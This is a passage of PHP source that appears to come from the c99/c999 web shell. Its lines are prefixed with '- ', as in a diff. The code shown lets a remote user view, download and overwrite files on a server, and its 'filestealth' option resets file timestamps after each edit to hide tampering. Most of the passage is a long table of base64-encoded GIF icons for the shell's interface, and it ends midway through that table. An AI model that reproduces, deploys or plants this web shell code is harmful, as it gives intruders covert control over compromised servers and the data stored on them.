- echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
- if (!empty($white)) {@ob_clean();}
- highlight_file($d.$f);
- if (!empty($white)) {c999shexit();}
- echo "</div>";
- }
- elseif ($ft == "download")
- {
- @ob_clean();
- header("Content-type: application/octet-stream");
- header("Content-length: ".filesize($d.$f));
- header("Content-disposition: attachment; filename=\"".$f."\";");
- echo $r;
- exit;
- }
- elseif ($ft == "notepad")
- {
- @ob_clean();
- header("Content-type: text/plain");
- header("Content-disposition: attachment; filename=\"".$f.".txt\";");
- echo($r);
- exit;
- }
- elseif ($ft == "img")
- {
- $inf = getimagesize($d.$f);
- if (!$white)
- {
- if (empty($imgsize)) {$imgsize = 20;}
- $width = $inf[0]/100*$imgsize;
- $height = $inf[1]/100*$imgsize;
- echo "<center><b>Size:</b> ";
- $sizes = array("100","50","20");
- foreach ($sizes as $v)
- {
- echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
- if ($imgsize != $v ) {echo $v;}
- else {echo "<u>".$v."</u>";}
- echo "</a> ";
- }
- echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
- }
- else
- {
- @ob_clean();
- $ext = explode($f,".");
- $ext = $ext[count($ext)-1];
- header("Content-type: ".$inf["mime"]);
- readfile($d.$f);
- exit;
- }
- }
- elseif ($ft == "edit")
- {
- if (!empty($submit))
- {
- if ($filestealth) {$stat = stat($d.$f);}
- $fp = fopen($d.$f,"w");
- if (!$fp) {echo "<b>Can't write to file!</b>";}
- else
- {
- echo "<b>Saved!</b>";
- fwrite($fp,$edit_text);
- fclose($fp);
- if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
- $r = $edit_text;
- }
- }
- $rows = count(explode("\r\n",$r));
- if ($rows < 10) {$rows = 10;}
- if ($rows > 30) {$rows = 30;}
- echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
- }
- elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
- else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
- }
- }
- }
- else
- {
- @ob_clean();
- $images = array(
- "arrow_ltr"=>
- "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
- "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
- "back"=>
- "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
- "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
- "Wg0JADs=",
- "buffer"=>
- "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
- "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
- "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
- "change"=>
- "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
- "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
- "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
- "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
- "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
- "zMshADs=",
- "delete"=>
- "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
- "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
- "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
- "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
- "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
- "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
- "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
- "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
- "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
- "download"=>
- "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
- "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
- "forward"=>
- "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
- "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
- "WqsJADs=",
- "home"=>
- "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
- "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
- "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
- "mode"=>
- "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
- "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
- "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
- "refresh"=>
- "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
- "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
- "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
- "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
- "search"=>
- "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
- "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
- "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
- "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
- "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
- "setup"=>
- "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
- "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
- "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
- "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
- "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
- "small_dir"=>
- "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
- "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
- "small_unk"=>
- "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
- "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
- "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
- "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
- "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
- "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
- "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
- "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
- "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
- "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
- "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
- "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
- "yAsokBkQADs=",
- "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
- "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
- "sort_asc"=>
- "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
- "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
- "sort_desc"=>
- "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
- "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
- "sql_button_drop"=>
- "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
- "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
- "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
- "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
- "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
- "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
- "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
- "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
- "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
- "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
- "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
- "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
- "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
- "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
- "AQEAOw==",
- "sql_button_empty"=>
- "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
- "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
- "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
- "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
- "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
- "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
- "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
- "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
- "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
- "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
- "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
- "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
- "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
- "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
- "sql_button_insert"=>
- "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
- "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
- "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
- "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
- "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
- "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
- "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
- "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
- "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
- "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
- "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
- "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
- "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
- "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
- "up"=>
- "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
- "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
- "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
- "write"=>
- "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
- "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
- "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
- "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
- "ext_asp"=>
- "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
- "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
- "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
- "ext_mp3"=>
- "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
- "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
- "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
- "ext_avi"=>
- "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
- "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
- "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
- "ext_cgi"=>
- "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
- "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
- "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
- "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
- "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
- "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
- "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
- "RYtMAgEAOw==",
- "ext_cmd"=>
- "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
- "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
- "dmrYAMn1onq/YKpjvEgAADs=",
- "ext_cpp"=>
- "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
- "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
- "Eq7YrLDE7a4SADs=",
- "ext_ini"=>
- "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
- "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
- "SnEjgPVarHEHgrB43JvszsQEADs=",
- "ext_diz"=>
- "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
- "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
- "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
- "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
- "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
- "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
- "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
- "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
- "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
- "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
- "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
- "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
- "Ow==",
- "ext_doc"=>
- "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
- "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
- "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
- "ext_exe"=>
- "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
- "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
- "xhIAOw==",
- "ext_h"=>
- "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
